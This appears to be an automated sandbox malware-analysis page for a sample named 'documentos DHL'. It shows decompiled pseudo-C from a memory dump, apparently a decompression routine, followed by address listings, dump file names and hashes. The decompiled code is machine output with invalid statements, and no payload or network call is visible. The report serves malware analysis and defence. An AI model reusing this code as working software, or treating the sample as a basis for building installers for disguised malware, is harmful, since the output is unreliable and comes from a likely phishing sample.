												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406d59
0x00406d59
0x00406d5d
0x00406d7e
0x00406d85
0x00406d8b
0x00406d91
0x00406da3
0x00406da9
0x00406dae
0x00000000
0x00406d5f
0x00406d65
0x00407126
0x00407126
0x00407126
0x00407129
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00407177
0x0040717b
0x0040732a
0x00407340
0x00407348
0x0040734f
0x00407351
0x00407358
0x0040735c
0x0040735c
0x00407187
0x0040718e
0x00407196
0x00407199
0x0040719c
0x0040719c
0x004071a2
0x004071a2
0x0040693e
0x0040693e
0x0040693e
0x00406947
0x00000000
0x00000000
0x0040694d
0x00000000
0x00406958
0x00000000
0x00000000
0x00406961
0x00406964
0x00406967
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b7
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x00000000
0x004072a9
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x00000000
0x004072b8
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406aba
0x00406abc
0x00406abf
0x00406b30
0x00406b33
0x00406b36
0x00406b3d
0x00406b47
0x00407126
0x00407126
0x00000000
0x00407126
0x00406ac1
0x00406ac5
0x00406ac8
0x00406aca
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af7
0x00406afb
0x00406b03
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b07
0x00406b0a
0x00406b28
0x00406b2a
0x00000000
0x00406b0c
0x00406b0c
0x00406b0f
0x00406b12
0x00406b15
0x00406b17
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00000000
0x00406b23
0x00000000
0x00000000
0x00000000
0x00406dc3
0x00406dc7
0x00406dea
0x00406ded
0x00406df0
0x00406dfa
0x00406dc9
0x00406dc9
0x00406dcc
0x00406dcf
0x00406dd2
0x00406ddf
0x00406de2
0x00406de2
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00000000
0x00406e06
0x00406e0a
0x00000000
0x00000000
0x00406e10
0x00406e14
0x00000000
0x00000000
0x00406e1a
0x00406e1c
0x00406e20
0x00406e20
0x00406e23
0x00406e27
0x00000000
0x00000000
0x00406e77
0x00406e7b
0x00406e82
0x00406e85
0x00406e88
0x00406e92
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00407126
0x00406e7d
0x00000000
0x00000000
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00406eb8
0x00406eb8
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ecb
0x00406ed0
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00406b53
0x00406b53
0x00406b57
0x004072c4
0x00000000
0x004072c4
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b72
0x00406b75
0x00406b78
0x00406b78
0x00406b7b
0x00406b7e
0x00000000
0x00000000
0x00406b84
0x00406b8a
0x00000000
0x00000000
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bee
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bf7
0x00406bfe
0x00406c01
0x00000000
0x00406c07
0x00000000
0x00406c07
0x00000000
0x00406c0c
0x00406c0c
0x00406c10
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c31
0x00406c31
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c54
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c7f
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c84
0x00406c8b
0x00406c8e
0x00000000
0x00406c90
0x00000000
0x00406c90
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c95
0x00000000
0x00000000
0x00406cd0
0x00406cd0
0x00406cd4
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf5
0x00406cfb
0x00406c99
0x00406c99
0x00406c9c
0x00000000
0x00406c9c
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d18
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d43
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d48
0x00406d4f
0x00406d52
0x00000000
0x00406d54
0x00000000
0x00406d54
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00000000
0x004070f0
0x004070f4
0x00407116
0x00407119
0x00407123
0x00407126
0x00407126
0x00407126
0x00000000
0x00407126
0x00407126
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407100
0x00407103
0x00000000
0x00000000
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x004071e4
0x004071e4
0x00000000
0x004071e4
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00407107
0x00407107
0x0040710a
0x00000000
0x00000000
0x0040729e
0x004072a1
0x004071a2
0x00000000
0x00000000
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00406eef
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406ef9
0x00406efa
0x00406efd
0x00406f04
0x00406f07
0x00406f15
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00000000
0x00000000
0x004071fa
0x004071fa
0x004071fe
0x00407336
0x00000000
0x00407336
0x00407204
0x00407207
0x0040720a
0x0040720e
0x00407211
0x00407217
0x00407219
0x00407219
0x00407219
0x0040721c
0x0040721f
0x0040721f
0x0040721f
0x0040721f
0x00407222
0x00407222
0x00407226
0x00407286
0x00407289
0x0040728e
0x0040728f
0x00407291
0x00407293
0x00407296
0x004071a2
0x004071a2
0x00000000
0x004071a8
0x004071a2
0x00407228
0x0040722e
0x00407231
0x00407234
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407246
0x00407249
0x00407262
0x00407265
0x00407268
0x0040726b
0x0040726f
0x00407271
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x00407253
0x00407258
0x0040725a
0x0040725d
0x0040725d
0x00407278
0x0040727f
0x00000000
0x00407281
0x00000000
0x00407281
0x00000000
0x00406f1d
0x00406f20
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00000000
0x00407318
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00406c9f
0x00406c9f
0x00406ca3
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e2e
0x004072f4
0x00000000
0x004072f4
0x00406e34
0x00406e37
0x00406e3a
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e60
0x00406e63
0x00406e65
0x00406e65
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x00406e68
0x00406e68
0x00000000
0x00406e68
0x004070e9
0x0040731e
0x00000000
0x00000000
0x0040694d
0x00407355
0x00407355
0x00000000
0x00407355
0x004071a2
0x00407129
0x00407126
0x00000000
0x00406d5d

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E77 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406E77() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
